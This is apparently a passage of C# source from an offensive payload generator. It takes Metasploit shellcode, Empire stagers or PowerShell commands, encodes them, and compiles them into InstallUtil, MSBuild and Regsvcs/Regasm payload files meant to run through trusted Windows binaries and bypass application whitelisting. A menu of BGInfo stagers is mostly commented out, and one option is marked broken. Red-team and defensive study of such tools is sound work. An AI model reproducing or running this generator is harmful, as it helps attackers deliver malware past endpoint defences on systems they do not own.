private static void MetaSploit()
{
/* Default filename */
string Filename_InstallUtilMetasploit_Default = "InstallUtilMetasploit.exe";
Helpers.WriteMetasploitExample();
Console.WriteLine("Paste in your Metasploit C# payload here");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit...");
string InstallUtil_Payload = Helpers.PasteToString();
string Outfile = Helpers.FileFolderLocation(Filename_InstallUtilMetasploit_Default);
Generators.GeneratePayload(Resources.Template_InstallUtil_Shellcode, Outfile, InstallUtil_Payload, "Compile", "/unsafe /platform:x86", null, null);
Console.WriteLine();
Console.WriteLine("Commands used to execute payload:");
Helpers.WriteInstallUtilPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void UnencodedPoshCommand()
{
string Filename_MsbuildUnencodedPowerShell_Default = "MSBuildUnencodedPowerShell.bypass";
Console.WriteLine("Type in your unencoded PowerShell command");
Console.WriteLine("");
Console.WriteLine("Example: Get-service > c:\\test\\file.csv");
Console.WriteLine("");
Console.WriteLine("Press Enter in an empty line to exit paste");
string Unencoded_PowerShell = Helpers.PasteToString();
var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(Unencoded_PowerShell);
Unencoded_PowerShell = System.Convert.ToBase64String(plainTextBytes);
string Outfile = Helpers.FileFolderLocation(Filename_MsbuildUnencodedPowerShell_Default);
Generators.GeneratePayload(Resources.Template_MSBuild_PowerShell, Outfile, Unencoded_PowerShell, "GenerateFile", null, null, null);
Helpers.WriteMSBuildPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void Empire()
{
string Filename_RegsvcsRegasmEmpireStagerDLL_Default = "RegsvcsRegasmEmpireStager.dll";
Helpers.WriteEmpireExample();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit paste");
string Empire_Stager = Helpers.PasteToString();
/* Decode */
string decoded = Encoding.Unicode.GetString(System.Convert.FromBase64String(Empire_Stager));
Console.WriteLine(decoded);
/* Replace & with . due to a bug of somekind */
string replaced = decoded.Replace("&", ".");
Console.WriteLine();
/* ENCODE */
string base64string = Convert.ToBase64String(Encoding.UTF8.GetBytes(replaced));
Console.WriteLine();
Empire_Stager = base64string;
string Outfile = Helpers.FileFolderLocation(Filename_RegsvcsRegasmEmpireStagerDLL_Default);
//Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/r:C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll /unsafe /platform:x86", null, null);
//Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/keyfile:meta.snk /unsafe /platform:x86", null, null);
// meta.snk hardcoded in template - file needs to be in dir where alby is run
Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/unsafe /platform:x86", null, null);
Helpers.WriteRegsvcsRegasmPayloadExample(Outfile);
Helpers.PauseExecution();
}
public static void Menu()
{
// Console.ForegroundColor = ConsoleColor.DarkMagenta;
// Console.WriteLine("NOT IMPLEMENTED YET - NEXT VERSION STUFF - BGINFO.EXE");
// Console.ResetColor();
Console.WriteLine("1. Empire Native VBS Stager - BROKEN");
Console.WriteLine("2. Empire StarFighter");
Console.WriteLine("3. Metasploit VBSMeter");
Console.WriteLine("4. Metasploit VBSWebMeter");
Console.WriteLine("0.Back");
string BGInfoSubChoice = Console.ReadLine();
Console.WriteLine();
if (BGInfoSubChoice == "1")
{
Generators.GenerateBGIFile("\\test\test", "C:\temp\test.bgi");
/* Default filename */
//string Filename_BGInfoEmpireNativeStager_Default = "BGInfoEmpireStager.vbs";
//
//Helpers.WriteEmpireExample();
//Console.ForegroundColor = ConsoleColor.Red;
//Console.WriteLine("Important! --Must be a Base64 encoded string of the PowerShell commands you want to run--");
//Console.ResetColor();
//Console.WriteLine("Press Enter in an empty line to exit...");
//
//string BGInfo_Payload = Helpers.PasteToString();
//string Outfile = Helpers.FileFolderLocation(Filename_BGInfoEmpireNativeStager_Default);
//
//Generators.GeneratePayload(Resources.Template_BGInfo_EmpireNative, Outfile, BGInfo_Payload, "GenerateFile", null);
//Helpers.WriteBGInfoPayloadExample(Outfile);
Console.ResetColor();
Helpers.PauseExecution();
}
//
// if (BGInfoSubChoice == "2")
// {
// break;
// /* Default filename */
// string Filename_BGInfoEmpireStarFighter_Default = "BGInfoEmpireStarfighter.vbs";
//
// Helpers.WriteEmpireExample();
// Console.ForegroundColor = ConsoleColor.Red;
// Console.WriteLine("Important! --Must be a Base64 encoded string of the PowerShell commands you want to run--");
// Console.ResetColor();
// Console.WriteLine("Press Enter in an empty line to exit...");
//
// string BGInfo_Payload = Helpers.PasteToString();
// string Outfile = Helpers.FileFolderLocation(Filename_BGInfoEmpireStarFighter_Default);
//
// Generators.GeneratePayload(Resources.Template_BGInfo_StarFighter, Outfile, BGInfo_Payload, "GenerateFile", null, null, null);
// Helpers.WriteBGInfoPayloadExample(Outfile);
// Console.ResetColor();
// Helpers.PauseExecution();
// break;
// }
// if (BGInfoSubChoice == "3")
// {
// break;
// }
//
// if (BGInfoSubChoice == "4")
// {
// break;
// }
// if (String.IsNullOrEmpty(BGInfoSubChoice) || BGInfoSubChoice == "0")
// {
// break;
// }
}